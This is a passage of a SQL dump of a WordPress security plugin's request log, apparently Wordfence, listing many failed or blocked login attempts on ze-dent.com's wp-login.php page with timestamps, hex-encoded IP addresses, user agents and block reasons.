(4570, 0.000000, 1594461507.913955, 0x00000000000000000000ffffb956a704, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4571, 0.000000, 1594469229.594126, 0x00000000000000000000ffff245e67f1, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://curiousbroadcast.com/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4572, 0.000000, 1594474159.393201, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4573, 0.000000, 1594482699.602057, 0x00000000000000000000ffffb955bfc4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4574, 0.000000, 1594489603.213882, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4575, 0.000000, 1594491227.276376, 0x00000000000000000000ffff23e4b187, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://cdhldb.com/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4576, 0.000000, 1594501685.906465, 0x00000000000000000000ffffb955be84, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4577, 0.000000, 1594503380.401664, 0x00000000000000000000ffff23e41b57, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.bigbensolutions.de/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4578, 0.000000, 1594509375.850329, 0x00000000000000000000ffff8e2c8b0c, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4579, 0.000000, 1594516423.163497, 0x00000000000000000000ffff23e41b57, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://pattersonautobody.com/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4580, 0.000000, 1594525041.287578, 0x00000000000000000000ffffb956a466, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4581, 0.000000, 1594533867.442134, 0x00000000000000000000ffffb956a46f, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4582, 0.000000, 1594539674.416082, 0x00000000000000000000ffffb9dc6607, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4583, 0.000000, 1594540168.627128, 0x00000000000000000000ffff23e41b57, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://brizolit.org/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4584, 0.000000, 1594541703.246929, 0x00000000000000000000ffffb956a704, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4585, 0.000000, 1594547694.710468, 0x00000000000000000000ffff452e2414, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/?_wfsf=detectProxy', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1', 'scan:detectproxy', NULL, NULL),
(4586, 0.000000, 1594550832.081205, 0x00000000000000000000ffff17fb82d6, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://lhorizonvert.fr/administrator/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4587, 0.000000, 1594551705.514070, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4588, 0.000000, 1594552493.558866, 0x00000000000000000000ffff4f82e3f6, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4589, 0.000000, 1594552505.169906, 0x00000000000000000000ffff67d8b013, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4590, 0.000000, 1594554179.040433, 0x00000000000000000000ffff9f41dbfa, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4591, 0.000000, 1594555038.288158, 0x00000000000000000000ffff8b3b52a3, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4592, 0.000000, 1594556271.685742, 0x00000000000000000000ffff90d953e1, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4593, 0.000000, 1594561460.558117, 0x00000000000000000000ffff2241753f, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.makesite.kr/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4594, 0.000000, 1594563442.839179, 0x00000000000000000000ffffb956a465, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4595, 0.000000, 1594567591.197029, 0x00000000000000000000ffffab06c76c, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4596, 0.000000, 1594568512.160374, 0x00000000000000000000ffffb956a704, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4597, 0.000000, 1594569384.709527, 0x00000000000000000000ffff51070e14, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4598, 0.000000, 1594572697.506410, 0x00000000000000000000ffff51d7be74, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4599, 0.000000, 1594575358.477936, 0x00000000000000000000ffff2241f717, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://jaegerhaeusle.de/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4600, 0.000000, 1594575667.744051, 0x00000000000000000000ffff59d39a6f, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4601, 0.000000, 1594577156.725205, 0x00000000000000000000ffff2241753f, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.kohls-fotografie.de/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4602, 0.000000, 1594579763.676932, 0x00000000000000000000ffff68f8934e, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4603, 0.000000, 1594581900.016523, 0x00000000000000000000ffffb977510b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4604, 0.000000, 1594582214.993570, 0x00000000000000000000ffffb2803057, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4605, 0.000000, 1594586419.585824, 0x00000000000000000000ffff3494f637, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4606, 0.000000, 1594587661.501841, 0x00000000000000000000ffffb955bfc9, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4607, 0.000000, 1594587848.371179, 0x00000000000000000000ffff86d1feba, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4608, 0.000000, 1594590494.819681, 0x00000000000000000000ffff23e48f61, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://www.rosacommodities.com/wp-login.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4609, 0.000000, 1594594910.791338, 0x00000000000000000000ffff8b3b8840, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4610, 0.000000, 1594597706.444117, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4611, 1594597720.376165, 1594597720.262200, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4612, 1594597717.788807, 1594597717.731200, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4613, 1594597717.173821, 1594597717.107200, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4614, 0.000000, 1594599767.036822, 0x00000000000000000000ffffb977510b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4615, 0.000000, 1594599868.880038, 0x00000000000000000000ffff86d11e9b, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4616, 0.000000, 1594607236.423257, 0x00000000000000000000ffff23e41b57, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://titanpavers.com/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4617, 0.000000, 1594608637.471641, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4618, 0.000000, 1594608855.421575, 0x00000000000000000000ffff23e48f61, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://alvinburstein.org/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4619, 0.000000, 1594610288.728436, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4620, 0.000000, 1594614121.253082, 0x00000000000000000000ffffc60bb221, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4621, 0.000000, 1594616317.667216, 0x00000000000000000000ffff6d466419, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4622, 0.000000, 1594618076.557724, 0x00000000000000000000ffffb955be84, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4623, 0.000000, 1594622354.334538, 0x00000000000000000000ffff23e41b57, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://carrosseriecico.ch/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4624, 0.000000, 1594624060.234366, 0x00000000000000000000ffff2e65a873, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4625, 0.000000, 1594625361.259333, 0x00000000000000000000ffff5d4e3457, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4626, 0.000000, 1594626768.847314, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4627, 1594626789.922397, 1594626789.847500, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4628, 1594626786.086152, 1594626786.030000, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4629, 0.000000, 1594629520.644976, 0x00000000000000000000ffffb4f4e953, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4630, 0.000000, 1594631010.895444, 0x00000000000000000000ffff90d953e1, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4631, 0.000000, 1594631879.247986, 0x00000000000000000000ffff2e65a873, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4632, 0.000000, 1594634148.777342, 0x00000000000000000000ffffc3ce69d9, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15', 'loginFailInvalidUsername', NULL, NULL),
(4633, 0.000000, 1594637426.941885, 0x00000000000000000000ffff23e48f61, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.lounge-en-zo.nl/administrator/', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4634, 0.000000, 1594648737.916459, 0x00000000000000000000ffffa5e36f27, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4635, 0.000000, 1594650002.352041, 0x00000000000000000000ffffb955bfc4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4636, 0.000000, 1594650285.703762, 0x00000000000000000000ffffcebd5558, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4637, 0.000000, 1594650768.124791, 0x00000000000000000000ffffb956a46b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4638, 0.000000, 1594651368.699205, 0x00000000000000000000ffffb7504745, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4639, 0.000000, 1594654055.290529, 0x00000000000000000000ffff36457614, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4640, 0.000000, 1594658791.222522, 0x00000000000000000000ffff23e48f61, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://skigardogtreskilt.no/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4641, 0.000000, 1594660842.592681, 0x00000000000000000000ffff867a1d2e, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4642, 0.000000, 1594662743.668776, 0x00000000000000000000ffffb956a466, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4643, 0.000000, 1594663183.183796, 0x00000000000000000000ffff44b792f9, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4644, 0.000000, 1594667157.875954, 0x00000000000000000000ffffbaea505b, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4645, 0.000000, 1594668453.372273, 0x00000000000000000000ffffb956a46b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4646, 0.000000, 1594669370.942904, 0x00000000000000000000ffff94428794, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4647, 0.000000, 1594673893.590114, 0x00000000000000000000ffff34e0e9bc, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4648, 0.000000, 1594675425.420109, 0x00000000000000000000ffff68f8934e, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4649, 0.000000, 1594676574.054051, 0x00000000000000000000ffff68ec2dab, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
